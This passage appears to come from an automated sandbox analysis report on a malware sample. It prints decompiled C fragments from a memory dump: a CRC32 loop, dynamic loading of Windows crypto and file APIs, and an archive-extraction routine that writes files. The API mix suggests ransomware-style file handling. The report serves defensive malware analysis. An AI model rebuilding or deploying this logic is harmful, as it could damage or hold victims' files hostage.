*_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
							_t73 =  &(_t79[2]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					if(_a12 != 0) {
						do {
							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
							_t73 =  &(_t73[1]);
							_t32 =  &_a12;
							 *_t32 = _a12 - 1;
						} while ( *_t32 != 0);
					}
					return  !_t35;
				} else {
					return 0;
				}
			}

0x00405422
0x00405427
0x00405436
0x0040543d
0x00405447
0x0040544a
0x0040544f
0x00405465
0x0040547f
0x00405496
0x004054ad
0x004054c4
0x004054db
0x00405503
0x00405505
0x00405506
0x00405506
0x0040550d
0x00405512
0x00405514
0x00405527
0x00405529
0x0040552a
0x0040552a
0x0040552a
0x00405514
0x00405534
0x00405429
0x0040542c
0x0040542c

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}

0x00401713
0x004017d8
0x00000000
0x004017d8
0x0040171b
0x00401721
0x004017d3
0x004017d5
0x00000000
0x004017d5
0x00401732
0x00401736
0x00000000
0x00000000
0x00401751
0x0040175e
0x0040176b
0x00401778
0x00401785
0x00401792
0x00401797
0x00401799
0x0040179f
0x004017a5
0x00000000
0x00000000
0x004017a7
0x004017ad
0x00000000
0x00000000
0x004017af
0x004017b5
0x00000000
0x00000000
0x004017b7
0x004017bd
0x00000000
0x00000000
0x004017bf
0x004017c5
0x00000000
0x00000000
0x004017c7
0x004017cd
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797

Strings

MoveFileExW, xrefs: 00401772
CloseHandle, xrefs: 0040178C
MoveFileW, xrefs: 00401765
ReadFile, xrefs: 00401758
WriteFile, xrefs: 0040174B
CreateFileW, xrefs: 00401743
kernel32.dll, xrefs: 00401727
DeleteFileW, xrefs: 0040177F

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
API String ID: 2238633743-1294736154
Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E

Uniqueness

Uniqueness Score: -1.00%

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}

0x00407136
0x00407136
0x00407140
0x00407148
0x0040714a
0x00407168
0x0040716b
0x0040716e
0x00407170
0x004071b7
0x004071c8
0x004071cd
0x004071cf
0x004071d3
0x004071d8
0x004071d8
0x004071d8
0x004071dc
0x004071dd
0x004071e1
0x004071ea
0x004071ec
0x004071fa
0x00000000
0x00407206
0x00000000
0x004071e3
0x004071e3
0x00000000
0x004071e3
0x004071e1
0x00407172
0x00407175
0x00407179
0x0040717e
0x0040717e
0x0040717f
0x00407181
0x00407185
0x00407188
0x0040715e
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407196
0x00407196
0x00407198
0x0040719b
0x004071ad
0x004071b3
0x004071b6
0x00000000
0x004071b6
0x0040719e
0x00407195
0x00000000
0x00407195
0x00407190
0x00000000
0x00407190
0x00407188
0x0040714f
0x00407210
0x00407214
0x00407218
0x0040721d
0x0040721d
0x0040721e
0x00407220
0x00407223
0x00407227
0x0040722a
0x00000000
0x00407230
0x00407230
0x00407233
0x0040723c
0x0040723c
0x0040723e
0x00407241
0x00407255
0x0040725a
0x00407261
0x0040729c
0x0040729f
0x004072a9
0x004072ac
0x004072ae
0x004072b0
0x004072b2
0x004072b2
0x004072b4
0x00000000
0x00000000
0x004072b6
0x004072b8
0x004072be
0x004072be
0x004072c1
0x004072c1
0x004072c4
0x00000000
0x004072c4
0x004072ba
0x004072bc
0x00000000
0x00000000
0x00000000
0x004072bc
0x004072cf
0x004072d5
0x004072d8
0x00407347
0x0040734f
0x00407356
0x0040737b
0x0040738f
0x0040739e
0x004073a3
0x00407312
0x00407312
0x0040732b
0x00407331
0x00407331
0x00407334
0x00407337
0x004073b3
0x004073b8
0x004073c0
0x004073c6
0x004073c9
0x004073ce
0x004073cf
0x004073cf
0x004073d5
0x004073d5
0x004073d5
0x004073d9
0x004073eb
0x004073ed
0x004073f0
0x004073f3
0x00000000
0x00000000
0x004073f5
0x004073f7
0x0040742a
0x0040742a
0x0040745a
0x0040745a
0x0040745e
0x00407463
0x00407463
0x0040746b
0x00000000
0x00407473
0x004073f9
0x00407415
0x00407415
0x00407419
0x00407454
0x00000000
0x00407454
0x0040741b
0x0040741d
0x00000000
0x00000000
0x00000000
0x0040741f
0x0040740b
0x00407411
0x00407413
0x00407433
0x00000000
0x00407433
0x00000000
0x00407413
0x00407421
0x00000000
0x00407421
0x00000000
0x00407339
0x00407358
0x0040735f
0x00000000
0x00000000
0x00407361
0x00407368
0x004072e1
0x004072e7
0x004072fc
0x0040730a
0x0040730f
0x00000000
0x0040730f
0x0040736e
0x00407375
0x00000000
0x00000000
0x00000000
0x00407375
0x004072da
0x004072da
0x004072da
0x00000000
0x004072da
0x004072a1
0x00000000
0x004072a1
0x00407263
0x00407266
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407271
0x00407273
0x00407283
0x00407283
0x00407284
0x00407290
0x00407290
0x00000000
0x00407296
0x00407275
0x00407277
0x00000000
0x00000000
0x00407279
0x0040727b
0x00407288
